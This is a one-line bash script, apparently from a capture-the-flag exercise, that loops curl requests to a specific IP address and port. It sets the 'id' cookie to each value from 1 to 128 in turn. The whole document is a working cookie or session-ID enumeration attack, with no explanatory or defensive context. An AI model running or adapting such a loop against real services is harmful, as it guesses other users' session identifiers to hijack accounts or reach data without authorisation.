#!/bin/bash # send cookie id from 1 to 128 for i in {1..128}; do curl -b id=$i http://62.173.140.174:16003 done